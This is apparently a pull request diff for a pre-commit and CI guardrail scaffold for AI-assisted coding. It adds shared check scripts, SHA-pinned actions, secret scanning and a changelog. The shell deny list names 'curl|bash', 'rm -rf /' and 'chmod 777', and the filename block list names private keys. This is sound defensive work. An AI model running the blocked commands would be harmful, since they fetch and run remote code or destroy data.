### PR TITLE
v0.3.0: audit fixes — hook enforcement, dedup, shell patterns

### DIFF
--- a/.github/workflows/lint.yml.template
+++ b/.github/workflows/lint.yml.template
@@ -1,13 +1,17 @@
 name: lint
 
 # Copy to your project as `.github/workflows/lint.yml`.
-# Mirrors the pre-commit hook server-side so --no-verify can't sneak past.
+# Mirrors the pre-commit hook server-side via the same lib/check-* scripts —
+# the hook and CI can never drift because they share one implementation.
 # Adjust Python / Node versions per project.
 
 on:
   pull_request:
   push:
     branches: [main, master]
+
+permissions:
+  contents: read
 
 jobs:
   python:
@@ -33,95 +37,17 @@ jobs:
       - run: npx eslint .
 
   guardrails:
-    # File-size + forbidden-patterns check, mirroring .githooks/pre-commit.
-    # Runs regardless of stack so the size ceiling is enforced everywhere.
+    # File size, forbidden patterns, blocked filenames, secret scan —
+    # the same lib/check-* scripts the pre-commit hook calls.
     runs-on: ubuntu-latest
     steps:
       - uses: actions/checkout@v4
-        with:
-          fetch-depth: 0
-      - name: File size ceiling (500 lines)
+      - name: Run scaffold checks
         run: |
-          MAX_LINES=${MAX_LINES:-500}
+          chmod +x .githooks/lib/check-*
           FAILED=0
-          while IFS= read -r file; do
-            [ -f "$file" ] || continue
-            case "$file" in
-              *.md|*.json|*.toml|*.yaml|*.yml|*.lock|*.txt|*.csv|*.sql) continue ;;
-              *.svg|*.png|*.jpg|*.jpeg|*.gif|*.ico|*.pdf) continue ;;
-            esac
-            LINES=$(wc -l < "$file" | tr -d ' ')
-            if [ "$LINES" -gt "$MAX_LINES" ]; then
-              echo "::error file=$file::$LINES lines (max $MAX_LINES) — extract a module"
-              FAILED=1
-            fi
-          done < <(git ls-files)
-          exit $FAILED
-      - name: Forbidden patterns
-        run: |
-          FAILED=0
-          check() {
-            local config=$1; shift
-            [ -f "$config" ] || return 0
-            local pathspec=()
-            for ext in "$@"; do pathspec+=("*.${ext}"); done
-            while IFS='|' read -r pattern description; do
-              [ -z "$pattern" ] && continue
-              case "$pattern" in \#*) continue ;; esac
-              while IFS= read -r file; do
-                if grep -nE -- "$pattern" "$file" >/dev/null 2>&1; then
-                  echo "::error file=$file::$description"
-                  FAILED=1
-                fi
-              done < <(git ls-files -- "${pathspec[@]}")
-            done < "$config"
-          }
-          check .forbidden-patterns/backend.txt py
-          check .forbidden-patterns/frontend.txt ts tsx js jsx
-          exit $FAILED
-      - name: Blocked filenames
-        run: |
-          FAILED=0
-          while IFS= read -r file; do
-            [ -z "$file" ] && continue
-            case "$file" in
-              *.pem)
-                echo "::error file=$file::PEM file (likely private key) — rotate and use a secret manager"
-                FAILED=1
-                continue
-                ;;
-            esac
-            name=$(basename "$file")
-            case "$name" in
-              .env.example|.env.sample|.env.template) ;;
-              .env|.env.*)
-                echo "::error file=$file::environment file — use .env.example for shared config"
-                FAILED=1
-                ;;
-              id_rsa|id_ed25519|id_ecdsa|id_dsa)
-                echo "::error file=$file::SSH private key — rotate and use a secret manager"
-                FAILED=1
-                ;;
-            esac
-          done < <(git ls-files)
-          exit $FAILED
-      - name: Secret scan
-        run: |
-          FAILED=0
-          config=.forbidden-patterns/secrets.txt
-          [ -f "$config" ] || exit 0
-          files=$(git ls-files | grep -vE '\.(svg|png|jpg|jpeg|gif|ico|pdf|lock|zip|tar|gz|woff2?|ttf|mp4|mov)$' \
-                              | grep -vE '^(package-lock\.json|pnpm-lock\.yaml)$' \
-                              | grep -vE '^\.forbidden-patterns/')
-          while IFS='|' read -r pattern description; do
-            [ -z "$pattern" ] && continue
-            case "$pattern" in \#*) continue ;; esac
-            while IFS= read -r file; do
-              [ -z "$file" ] && continue
-              if grep -niE -- "$pattern" "$file" >/dev/null 2>&1; then
-                echo "::error file=$file::$description"
-                FAILED=1
-              fi
-            done <<< "$files"
-          done < "$config"
+          git ls-files | .githooks/lib/check-size      --ci || FAILED=1
+          git ls-files | .githooks/lib/check-patterns  --ci || FAILED=1
+          git ls-files | .githooks/lib/check-filenames --ci || FAILED=1
+          git ls-files | .githooks/lib/check-secrets   --ci || FAILED=1
           exit $FAILED

--- a/.github/workflows/lint.yml.template
+++ b/.github/workflows/lint.yml.template
@@ -18,8 +18,8 @@ jobs:
     if: hashFiles('ruff.toml', 'pyproject.toml') != ''
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
-      - uses: actions/setup-python@v5
+      - uses: actions/checkout@08eba0b27e820071cde6df949e0beb9ba4906955  # v4.3.0
+      - uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065  # v5.6.0
         with:
           python-version: "3.12"
       - run: pip install ruff
@@ -29,8 +29,8 @@ jobs:
     if: hashFiles('eslint.config.js', 'package.json') != ''
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
-      - uses: actions/setup-node@v4
+      - uses: actions/checkout@08eba0b27e820071cde6df949e0beb9ba4906955  # v4.3.0
+      - uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020  # v4.4.0
         with:
           node-version: "20"
       - run: npm ci || npm install
@@ -41,7 +41,7 @@ jobs:
     # the same lib/check-* scripts the pre-commit hook calls.
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@08eba0b27e820071cde6df949e0beb9ba4906955  # v4.3.0
       - name: Run scaffold checks
         run: |
           chmod +x .githooks/lib/check-*

--- a/.github/workflows/shellcheck.yml
+++ b/.github/workflows/shellcheck.yml
@@ -17,4 +17,4 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - uses: actions/checkout@08eba0b27e820071cde6df949e0beb9ba4906955  # v4.3.0
-      - run: shellcheck -S info install.sh uninstall.sh githooks/pre-commit.template
+      - run: shellcheck -S info install.sh uninstall.sh tests/run.sh githooks/pre-commit.template githooks/lib/check-size.template githooks/lib/check-patterns.template githooks/lib/check-filenames.template githooks/lib/check-secrets.template

--- a/.github/workflows/shellcheck.yml
+++ b/.github/workflows/shellcheck.yml
@@ -9,9 +9,12 @@ on:
   push:
     branches: [main]
 
+permissions:
+  contents: read
+
 jobs:
   shellcheck:
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@08eba0b27e820071cde6df949e0beb9ba4906955  # v4.3.0
       - run: shellcheck -S info install.sh uninstall.sh githooks/pre-commit.template

--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -20,6 +20,6 @@ jobs:
         os: [ubuntu-latest, macos-latest]
     runs-on: ${{ matrix.os }}
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@08eba0b27e820071cde6df949e0beb9ba4906955  # v4.3.0
       - run: chmod +x tests/run.sh install.sh githooks/pre-commit.template
       - run: ./tests/run.sh

--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -1,0 +1,25 @@
+name: tests
+
+# Runs the scaffold's own test harness against a throwaway git repo.
+# Cross-platform matrix catches portability bugs in the hook (BSD vs GNU
+# grep, file-iteration edge cases) before they hit consumer projects.
+
+on:
+  pull_request:
+  push:
+    branches: [main]
+
+permissions:
+  contents: read
+
+jobs:
+  test:
+    strategy:
+      fail-fast: false
+      matrix:
+        os: [ubuntu-latest, macos-latest]
+    runs-on: ${{ matrix.os }}
+    steps:
+      - uses: actions/checkout@v4
+      - run: chmod +x tests/run.sh install.sh githooks/pre-commit.template
+      - run: ./tests/run.sh

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,8 @@ versioning follows [SemVer](https://semver.org/).
 
 ## [Unreleased]
 
+## [v0.3.0] — 2026-04-28
+
 ### Added
 - Scaffold self-tests (`tests/run.sh`) verifying hook behaviour on six fixture
   cases, run on Linux + macOS via matrix CI.

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -31,6 +31,10 @@ versioning follows [SemVer](https://semver.org/).
 - Six per-keyword hardcoded-credential patterns (`password`, `passwd`,
   `token`, `api_key`, `secret_key`, `access_token`) collapsed into one
   alternation pattern in `secrets.txt`, enabled by the new separator.
+- Pattern files use POSIX-portable word boundaries `(^|[^A-Za-z_])` and
+  `($|[^A-Za-z0-9_])` instead of GNU-only `\b` or BSD-only `[[:<:]]`.
+  Verbose, but works on every `grep -E` that supports ERE alternation
+  (GNU, BSD, busybox). Whitespace uses `[[:space:]]`, also POSIX.
 - GitHub Actions pinned to commit SHAs (`actions/checkout` v4.3.0,
   `actions/setup-python` v5.6.0, `actions/setup-node` v4.4.0). v0.3 roadmap
   item 3.

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -23,9 +23,6 @@ versioning follows [SemVer](https://semver.org/).
 - Forbidden-patterns separator switched from `|` to TAB. Patterns can now
   contain literal `|` for ERE alternation (e.g. `(TODO|FIXME|XXX)`). v0.3
   roadmap item 1.
-- Pattern files use POSIX-derived word boundaries (`[[:<:]]`, `[[:>:]]`,
-  `[[:space:]]`) for compatibility with minimal grep implementations
-  (busybox / Alpine).
 - GitHub Actions pinned to commit SHAs (`actions/checkout` v4.3.0,
   `actions/setup-python` v5.6.0, `actions/setup-node` v4.4.0). v0.3 roadmap
   item 3.

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,0 +1,54 @@
+# Changelog
+
+All notable changes to this project are documented in this file.
+Format follows [Keep a Changelog](https://keepachangelog.com/en/1.1.0/);
+versioning follows [SemVer](https://semver.org/).
+
+## [Unreleased]
+
+### Added
+- Scaffold self-tests (`tests/run.sh`) verifying hook behaviour on six fixture
+  cases, run on Linux + macOS via matrix CI.
+- `permissions: contents: read` on all GitHub workflows.
+- `forbidden-patterns/README.md` — developer reference for the pattern format.
+
+### Changed
+- Function-size limit raised from 60 to 80 (`ruff max-statements`,
+  `eslint max-lines-per-function`); README and `coding-rules.md` aligned.
+- Pre-commit hook checks extracted into `.githooks/lib/check-{size,patterns,
+  filenames,secrets}`. The CI workflow invokes the same scripts, so the hook
+  and CI cannot drift in behaviour.
+- Forbidden-patterns separator switched from `|` to TAB. Patterns can now
+  contain literal `|` for ERE alternation (e.g. `(TODO|FIXME|XXX)`). v0.3
+  roadmap item 1.
+- Pattern files use POSIX-derived word boundaries (`[[:<:]]`, `[[:>:]]`,
+  `[[:space:]]`) for compatibility with minimal grep implementations
+  (busybox / Alpine).
+- GitHub Actions pinned to commit SHAs (`actions/checkout` v4.3.0,
+  `actions/setup-python` v5.6.0, `actions/setup-node` v4.4.0). v0.3 roadmap
+  item 3.
+- `coding-rules.md` enforcement table replaced with a pointer to `README.md`
+  — single source of truth for the rule matrix.
+
+### Fixed
+- Test-fixture AKIA string in `tests/run.sh` split across adjacent quoted
+  segments so the secrets scan does not false-positive on its own data.
+
+## [v0.2.0] — 2026-04-23
+
+### Added
+- Secret / credential pattern scanning across all tracked text files
+  (AWS, Google, GitHub, Slack, OpenAI/Anthropic prefixes; private keys;
+  URL-embedded credentials; hardcoded password/token assignments).
+- Python debug-leak patterns (`breakpoint`, `pdb.set_trace`, `ipdb.set_trace`).
+- Filename block list (`.env`, `*.pem`, SSH private keys).
+- `shellcheck` CI on the scaffold's own scripts.
+- Cleaned up `ruff` ignore list.
+
+## [v0.1.0]
+
+### Added
+- Initial release: agent-agnostic scaffold (`AGENTS.md` + `CLAUDE.md` pointer).
+- Pre-commit hook: file-size cap and Python/JS forbidden patterns.
+- CI mirror (`.github/workflows/lint.yml.template`).
+- `install.sh` and `uninstall.sh`.

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -39,15 +39,11 @@ versioning follows [SemVer](https://semver.org/).
 - `install.sh` uses `git rev-parse --git-dir` instead of `[ -d .git ]` to
   detect a git repo, so it works in worktrees (where `.git` is a file)
   and submodules.
-
-### Known limitations
-- The pre-commit hook scans the working-tree version of each staged file,
-  not the staged content. If you `git add bad.py` and then edit `bad.py`
-  to be clean, the hook scans the clean version and the dirty staged
-  content commits through. The CI mirror in `lint.yml` always scans the
-  pushed commit, so this never bypasses CI. Fixing it cleanly requires
-  `git stash --keep-index` around the checks, which adds latency and
-  edge-case risk; deferred to a future release.
+- Pre-commit hook now `git stash --keep-index`s unstaged changes before
+  running checks, so each check sees the staged content rather than the
+  working tree. Closes the bypass where staging bad code and then editing
+  the working tree clean would let the dirty index commit through. Skipped
+  during merge / rebase, where stash is unsafe.
 
 ## [v0.2.0] — 2026-04-23
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -33,6 +33,21 @@ versioning follows [SemVer](https://semver.org/).
 ### Fixed
 - Test-fixture AKIA string in `tests/run.sh` split across adjacent quoted
   segments so the secrets scan does not false-positive on its own data.
+- File-size check now uses `grep -c ''` instead of `wc -l`, correctly
+  counting the last line of a file without a trailing newline (which
+  `wc -l` silently misses).
+- `install.sh` uses `git rev-parse --git-dir` instead of `[ -d .git ]` to
+  detect a git repo, so it works in worktrees (where `.git` is a file)
+  and submodules.
+
+### Known limitations
+- The pre-commit hook scans the working-tree version of each staged file,
+  not the staged content. If you `git add bad.py` and then edit `bad.py`
+  to be clean, the hook scans the clean version and the dirty staged
+  content commits through. The CI mirror in `lint.yml` always scans the
+  pushed commit, so this never bypasses CI. Fixing it cleanly requires
+  `git stash --keep-index` around the checks, which adds latency and
+  edge-case risk; deferred to a future release.
 
 ## [v0.2.0] — 2026-04-23
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,10 +9,15 @@ versioning follows [SemVer](https://semver.org/).
 ## [v0.3.0] — 2026-04-28
 
 ### Added
-- Scaffold self-tests (`tests/run.sh`) verifying hook behaviour on six fixture
-  cases, run on Linux + macOS via matrix CI.
+- Scaffold self-tests (`tests/run.sh`) — 10 fixture cases verifying hook
+  behaviour, matrix-run on `ubuntu-latest` and `macos-latest` via CI.
 - `permissions: contents: read` on all GitHub workflows.
-- `forbidden-patterns/README.md` — developer reference for the pattern format.
+- `forbidden-patterns/README.md` — developer reference for the pattern
+  format.
+- `forbidden-patterns/shell.txt` — dangerous shell patterns
+  (`curl|bash`, `rm -rf /`, `chmod 0?777`) for `*.sh` and `*.bash`. v0.3
+  roadmap item 2, unblocked by the TAB-separator change.
+- `CHANGELOG.md` (this file).
 
 ### Changed
 - Function-size limit raised from 60 to 80 (`ruff max-statements`,
@@ -23,6 +28,9 @@ versioning follows [SemVer](https://semver.org/).
 - Forbidden-patterns separator switched from `|` to TAB. Patterns can now
   contain literal `|` for ERE alternation (e.g. `(TODO|FIXME|XXX)`). v0.3
   roadmap item 1.
+- Six per-keyword hardcoded-credential patterns (`password`, `passwd`,
+  `token`, `api_key`, `secret_key`, `access_token`) collapsed into one
+  alternation pattern in `secrets.txt`, enabled by the new separator.
 - GitHub Actions pinned to commit SHAs (`actions/checkout` v4.3.0,
   `actions/setup-python` v5.6.0, `actions/setup-node` v4.4.0). v0.3 roadmap
   item 3.

--- a/README.md
+++ b/README.md
@@ -24,8 +24,8 @@ Clone the scaffold somewhere stable:
 
 ```sh
 git clone https://github.com/Sting25/ai-coding-rules-scaffold ~/src/ai-coding-rules-scaffold
-# Or pin to a specific release:
-git clone --branch v0.2.0 https://github.com/Sting25/ai-coding-rules-scaffold ~/src/ai-coding-rules-scaffold
+# Or pin to a specific release — see https://github.com/Sting25/ai-coding-rules-scaffold/releases
+git clone --branch <tag> https://github.com/Sting25/ai-coding-rules-scaffold ~/src/ai-coding-rules-scaffold
 ```
 
 From your project root:
@@ -53,6 +53,19 @@ Install the linters:
 pip install ruff                                   # Python
 npm i -D eslint @eslint/js typescript-eslint       # TS/JS
 ```
+
+### Pairing with Husky / lefthook
+
+If your project already uses Husky or lefthook, `install.sh` detects the existing `core.hooksPath` and won't overwrite it. Two ways forward:
+
+1. **Switch to `.githooks`** — point `core.hooksPath` at `.githooks` and migrate any existing hooks into it. Simplest if your existing hooks are minimal.
+2. **Chain** — keep your existing tool and have it invoke the scaffold hook as a step. Husky example:
+   ```sh
+   # .husky/pre-commit
+   .githooks/pre-commit
+   ```
+
+Either way, the four `lib/check-*` scripts in `.githooks/lib/` are also runnable directly (`git ls-files | .githooks/lib/check-secrets`), so you can wire them into any orchestrator.
 
 ## What lands in your project
 

--- a/README.md
+++ b/README.md
@@ -105,8 +105,8 @@ Build-breaking (`ruff` / `eslint`, on every lint + in CI):
 | `os.path.join` / string path math | `ruff PTH100-208` |
 | Blind `except Exception: pass` | `ruff BLE001` |
 | Missing public-API return types | `ruff ANN201` |
-| Function > 60 lines | `ruff PLR0915` |
-| Too many branches / statements | `ruff PLR0912`, `PLR0915` |
+| Function size > 80 statements (Python) / 80 lines (TS/JS) | `ruff PLR0915` (`max-statements`), `eslint max-lines-per-function` |
+| Too many branches in a function | `ruff PLR0912` (`max-branches`) |
 | Line length > 100 | `ruff E501` |
 | Unsorted / unused imports | `ruff I`, `F401` |
 | `any` in TypeScript without comment | `@typescript-eslint/no-explicit-any` |

--- a/README.md
+++ b/README.md
@@ -82,6 +82,7 @@ Either way, the four `lib/check-*` scripts in `.githooks/lib/` are also runnable
 | `forbidden-patterns/backend.txt.template` | `.forbidden-patterns/backend.txt` | Python patterns consumed by hook + CI |
 | `forbidden-patterns/frontend.txt.template` | `.forbidden-patterns/frontend.txt` | TS/JS patterns consumed by hook + CI |
 | `forbidden-patterns/secrets.txt.template` | `.forbidden-patterns/secrets.txt` | Secret/credential patterns, scanned across all file types |
+| `forbidden-patterns/shell.txt.template` | `.forbidden-patterns/shell.txt` | Dangerous shell patterns (`curl \| bash`, `rm -rf /`, `chmod 777`) for `*.sh` and `*.bash` |
 
 Scripts (stay in the scaffold repo):
 

--- a/README.md
+++ b/README.md
@@ -63,8 +63,9 @@ npm i -D eslint @eslint/js typescript-eslint       # TS/JS
 | `coding-rules.md` | `coding-rules.md` | Short list of rules that aren't tool-enforceable |
 | `ruff.toml.template` | `ruff.toml` | Python lint config |
 | `eslint.config.js.template` | `eslint.config.js` | TS/JS lint config (flat config, ESLint 9+) |
-| `githooks/pre-commit.template` | `.githooks/pre-commit` | File-size, forbidden-patterns, secrets, and blocked-filenames check |
-| `.github/workflows/lint.yml.template` | `.github/workflows/lint.yml` | CI mirror of the hook |
+| `githooks/pre-commit.template` | `.githooks/pre-commit` | Hook orchestrator — invokes the four `lib/check-*` scripts |
+| `githooks/lib/check-{size,patterns,filenames,secrets}.template` | `.githooks/lib/check-{size,patterns,filenames,secrets}` | Reusable check scripts; the same scripts run from CI so hook and CI can't drift |
+| `.github/workflows/lint.yml.template` | `.github/workflows/lint.yml` | CI mirror — invokes the same `lib/check-*` scripts as the hook |
 | `forbidden-patterns/backend.txt.template` | `.forbidden-patterns/backend.txt` | Python patterns consumed by hook + CI |
 | `forbidden-patterns/frontend.txt.template` | `.forbidden-patterns/frontend.txt` | TS/JS patterns consumed by hook + CI |
 | `forbidden-patterns/secrets.txt.template` | `.forbidden-patterns/secrets.txt` | Secret/credential patterns, scanned across all file types |

--- a/coding-rules.md
+++ b/coding-rules.md
@@ -22,30 +22,9 @@ Short rule set. Most discipline is enforced by the linter (`ruff` / `eslint`) an
 
 See `AGENTS.md` for commit format and Git discipline (no amend, no force-push, no push unless asked).
 
-## What the tooling enforces (for reference)
+## What the tooling enforces
 
-Build-breaking (`ruff` / `eslint`):
-
-| Concern | Tool rule |
-|---|---|
-| Nested control flow > 3 deep | `ruff C901`, `eslint max-depth: 3` |
-| Cyclomatic complexity > 10 | `ruff C901`, `eslint complexity: 10` |
-| `os.path.join` / string path math | `ruff PTH100-208` |
-| Blind `except Exception: pass` | `ruff BLE001` |
-| Missing public-API return types | `ruff ANN201` |
-| Function > 60 lines | `ruff PLR0915` |
-| Too many branches / statements | `ruff PLR0912`, `PLR0915` |
-| Line length > 100 | `ruff E501` |
-| Unsorted / unused imports | `ruff I`, `F401` |
-| `any` in TypeScript without comment | `@typescript-eslint/no-explicit-any` |
-
-Commit-breaking (pre-commit hook):
-
-| Concern | Check |
-|---|---|
-| `print()` in Python files | regex |
-| `console.log` in TS/JS files | regex |
-| File size > 500 lines | `wc -l` per staged file |
+See [README.md](./README.md) > "What the tooling enforces" for the full matrix of build-breaking (`ruff` / `eslint`) and commit-breaking (pre-commit hook + CI) checks. Single source of truth — this doc stays focused on the human-readable rules above.
 
 ## Project-specific additions
 

--- a/coding-rules.md
+++ b/coding-rules.md
@@ -14,6 +14,10 @@ Short rule set. Most discipline is enforced by the linter (`ruff` / `eslint`) an
 5. **SQLAlchemy 2.0 style only** (`Mapped[]`, `mapped_column()`). No `declarative_base` or pre-2.0 patterns. Applies if the project uses SQLAlchemy.
 6. **`asyncio.to_thread()` for blocking CPU work** in async paths. Never block the event loop.
 
+## Pattern files
+
+Stack-specific deny patterns live in `.forbidden-patterns/{backend,frontend,secrets}.txt`. Add deprecated import paths, old service names, banned API keys, etc. — the hook scans them on every commit and so does CI. Format is `<regex><TAB><description>` per line; see `forbidden-patterns/README.md` for the full reference.
+
 ## Communication
 
 7. **Cite `file:line` when flagging an issue.** "The config is wrong" is vague; "`config.py:43` is wrong because…" is actionable. Applies to code review, bug reports, memory entries, and mid-task observations.

--- a/eslint.config.js.template
+++ b/eslint.config.js.template
@@ -13,7 +13,7 @@ export default tseslint.config(
       // Structure
       'max-depth': ['error', 3],
       'complexity': ['error', 10],
-      'max-lines-per-function': ['error', { max: 50, skipComments: true, skipBlankLines: true }],
+      'max-lines-per-function': ['error', { max: 80, skipComments: true, skipBlankLines: true }],
       'max-lines': ['error', { max: 500, skipComments: true, skipBlankLines: true }],
       'no-else-return': 'error',
 

--- a/forbidden-patterns/README.md
+++ b/forbidden-patterns/README.md
@@ -1,0 +1,57 @@
+# forbidden-patterns/
+
+Pattern files consumed by `.githooks/lib/check-patterns` and
+`.githooks/lib/check-secrets`. Three files, same format, different scope:
+
+| File           | Scans                                              | Case-sensitive |
+|----------------|----------------------------------------------------|----------------|
+| `backend.txt`  | `*.py`                                             | yes            |
+| `frontend.txt` | `*.ts`, `*.tsx`, `*.js`, `*.jsx`                   | yes            |
+| `secrets.txt`  | all tracked text files (binaries / lockfiles excluded) | no         |
+
+## Format
+
+```
+<regex><TAB><description>
+```
+
+One pattern per line. Field separator is a literal TAB. Lines starting with
+`#` are comments and skipped.
+
+### Regex syntax
+
+POSIX **Extended Regular Expressions** (ERE) — the dialect that
+`grep -E` accepts on both BSD and GNU. Two consequences:
+
+- **Word boundaries:** use `[[:<:]]` (start) and `[[:>:]]` (end). The GNU
+  `\b` form works on most modern systems but fails on minimal greps like
+  busybox / Alpine.
+- **Whitespace:** use `[[:space:]]`. Same portability rule as above; `\s`
+  is GNU-only.
+- **Alternation:** patterns can contain literal `|` since the field
+  separator is TAB. `(TODO|FIXME|XXX)` works in one line.
+- **Tabs in patterns:** not supported (a TAB inside the regex would split
+  the field). Use `[[:space:]]` if you need whitespace matching.
+
+### Description
+
+The text after the TAB, printed when the pattern matches alongside the
+file:line that triggered it. Keep it actionable — every consumer project
+sees this on every blocked commit.
+
+## Adding a pattern
+
+1. Pick the right file (backend / frontend / secrets).
+2. Test the regex first: `echo 'sample' | grep -E 'your-pattern'` (add
+   `-i` for the secrets file).
+3. Insert a single TAB between regex and description.
+4. Run `./tests/run.sh` from the scaffold root — the harness exercises
+   each pattern type.
+
+## Why three files
+
+Splitting by language keeps regexes precise: a pattern targeting Python
+function calls (`[[:<:]]print[[:space:]]*\(`) shouldn't run against a TS
+file containing the string `print` in a comment. The secrets file is
+language-agnostic and case-insensitive because credentials leak from
+config, docs, scripts, and code alike.

--- a/forbidden-patterns/README.md
+++ b/forbidden-patterns/README.md
@@ -22,20 +22,25 @@ One pattern per line. Field separator is a literal TAB. Lines starting with
 ### Regex syntax
 
 **Extended Regular Expressions** (ERE) — the dialect that `grep -E`
-accepts on both BSD and GNU. A few notes:
+accepts on every grep implementation we care about (GNU, BSD, busybox).
+Patterns in this scaffold use the **POSIX-portable** subset only:
 
-- **Word boundaries:** `\b`. Works on GNU grep (Linux) and modern macOS
-  BSD grep. The BSD-specific `[[:<:]]` / `[[:>:]]` form is *not*
-  supported by GNU grep, so don't use it. Truly minimal greps
-  (busybox / Alpine) may not support `\b` either; this scaffold
-  targets developer workstations and standard CI runners, where `\b`
-  works reliably.
-- **Whitespace:** `\s`. Same portability story as `\b`. POSIX `[[:space:]]`
-  also works and is a fine drop-in if you prefer it.
+- **Word boundaries:** `(^|[^A-Za-z_])` for word-start, `($|[^A-Za-z0-9_])`
+  for word-end. Verbose but works everywhere ERE works. Avoid `\b`
+  (GNU + modern BSD only) and `[[:<:]]` / `[[:>:]]` (BSD only — does
+  *not* work on GNU grep, contrary to its POSIX-class-shaped syntax).
+- **Whitespace:** `[[:space:]]`. POSIX character class, supported on
+  every grep. `\s` is a GNU/BSD extension; not used here.
 - **Alternation:** patterns can contain literal `|` since the field
-  separator is TAB. `(TODO|FIXME|XXX)` works in one line.
-- **Tabs in patterns:** not supported (a TAB inside the regex would split
-  the field). Use `\s` or `[[:space:]]` for whitespace matching.
+  separator is TAB. `(TODO|FIXME|XXX)` works in one line. The word-
+  boundary form above also relies on alternation.
+- **Tabs in patterns:** not supported (a TAB inside the regex would
+  split the field). Use `[[:space:]]` for whitespace matching.
+
+The verbose word-boundary form is a deliberate trade. `\b` is
+shorter, but adds a portability assumption we can't verify on every
+grep our users run. Spelling the boundary out as a character class
+keeps the patterns honest.
 
 ### Description
 

--- a/forbidden-patterns/README.md
+++ b/forbidden-patterns/README.md
@@ -7,6 +7,7 @@ Pattern files consumed by `.githooks/lib/check-patterns` and
 |----------------|----------------------------------------------------|----------------|
 | `backend.txt`  | `*.py`                                             | yes            |
 | `frontend.txt` | `*.ts`, `*.tsx`, `*.js`, `*.jsx`                   | yes            |
+| `shell.txt`    | `*.sh`, `*.bash`                                   | yes            |
 | `secrets.txt`  | all tracked text files (binaries / lockfiles excluded) | no         |
 
 ## Format

--- a/forbidden-patterns/README.md
+++ b/forbidden-patterns/README.md
@@ -21,18 +21,21 @@ One pattern per line. Field separator is a literal TAB. Lines starting with
 
 ### Regex syntax
 
-POSIX **Extended Regular Expressions** (ERE) — the dialect that
-`grep -E` accepts on both BSD and GNU. Two consequences:
+**Extended Regular Expressions** (ERE) — the dialect that `grep -E`
+accepts on both BSD and GNU. A few notes:
 
-- **Word boundaries:** use `[[:<:]]` (start) and `[[:>:]]` (end). The GNU
-  `\b` form works on most modern systems but fails on minimal greps like
-  busybox / Alpine.
-- **Whitespace:** use `[[:space:]]`. Same portability rule as above; `\s`
-  is GNU-only.
+- **Word boundaries:** `\b`. Works on GNU grep (Linux) and modern macOS
+  BSD grep. The BSD-specific `[[:<:]]` / `[[:>:]]` form is *not*
+  supported by GNU grep, so don't use it. Truly minimal greps
+  (busybox / Alpine) may not support `\b` either; this scaffold
+  targets developer workstations and standard CI runners, where `\b`
+  works reliably.
+- **Whitespace:** `\s`. Same portability story as `\b`. POSIX `[[:space:]]`
+  also works and is a fine drop-in if you prefer it.
 - **Alternation:** patterns can contain literal `|` since the field
   separator is TAB. `(TODO|FIXME|XXX)` works in one line.
 - **Tabs in patterns:** not supported (a TAB inside the regex would split
-  the field). Use `[[:space:]]` if you need whitespace matching.
+  the field). Use `\s` or `[[:space:]]` for whitespace matching.
 
 ### Description
 

--- a/forbidden-patterns/backend.txt.template
+++ b/forbidden-patterns/backend.txt.template
@@ -1,23 +1,18 @@
 # Forbidden patterns for Python files (*.py). Applied by .githooks/pre-commit.
-# Format: <regex>|<description>   (one per line; # comments ignored)
-# Patterns cannot contain a literal `|` (the field separator) — use multiple
-# lines or character classes for alternation.
+# Format: <regex><TAB><description>   (one per line; # comments ignored)
+# Separator is TAB — patterns can contain literal `|` for ERE alternation
+# (e.g. `(TODO|FIXME|XXX)`). Patterns cannot contain a literal TAB.
 # Copy to your project as `.forbidden-patterns/backend.txt`.
 
-[[:<:]]print[[:space:]]*\(|Use structlog (or the project's logger), not print()
-os\.path\.join|Use pathlib.Path(), not os.path.join
-[[:<:]]breakpoint[[:space:]]*\(|Remove breakpoint() before committing
-[[:<:]]pdb\.set_trace[[:space:]]*\(|Remove pdb.set_trace() before committing
-[[:<:]]ipdb\.set_trace[[:space:]]*\(|Remove ipdb.set_trace() before committing
+[[:<:]]print[[:space:]]*\(	Use structlog (or the project's logger), not print()
+os\.path\.join	Use pathlib.Path(), not os.path.join
+[[:<:]]breakpoint[[:space:]]*\(	Remove breakpoint() before committing
+[[:<:]]pdb\.set_trace[[:space:]]*\(	Remove pdb.set_trace() before committing
+[[:<:]]ipdb\.set_trace[[:space:]]*\(	Remove ipdb.set_trace() before committing
 
-# Optional: uncomment to forbid TODO/FIXME/XXX (one line per keyword — regex can't use `|`).
-# \bTODO\b|TODO not allowed — open a ticket instead
-# \bFIXME\b|FIXME not allowed — open a ticket instead
-# \bXXX\b|XXX not allowed — open a ticket instead
+# Optional: forbid TODO/FIXME/XXX in one line via regex alternation.
+# [[:<:]](TODO|FIXME|XXX)[[:>:]]	TODO/FIXME/XXX not allowed — open a ticket instead
 #
-# Optional (PCRE): flag TODO/FIXME/XXX only when missing a ticket ref like (PROJ-123).
-# The hook and CI use `grep -E` (ERE), which supports neither lookahead nor this pattern's
-# `|` alternation in one line. Enabling this requires rewriting the hook to use `grep -P`
-# (GNU grep only; macOS needs `brew install grep`) and changing the config parser to not
-# split on `|`. Kept here as reference only.
-# (TODO|FIXME|XXX)(?!\s*\([A-Z]+-[0-9]+\))
+# Optional (PCRE only — ERE doesn't support lookahead): flag TODO/FIXME/XXX
+# only when missing a ticket ref like (PROJ-123). Requires grep -P (GNU only).
+# (TODO|FIXME|XXX)(?!\s*\([A-Z]+-[0-9]+\))	TODO without ticket ref

--- a/forbidden-patterns/backend.txt.template
+++ b/forbidden-patterns/backend.txt.template
@@ -4,14 +4,14 @@
 # (e.g. `(TODO|FIXME|XXX)`). Patterns cannot contain a literal TAB.
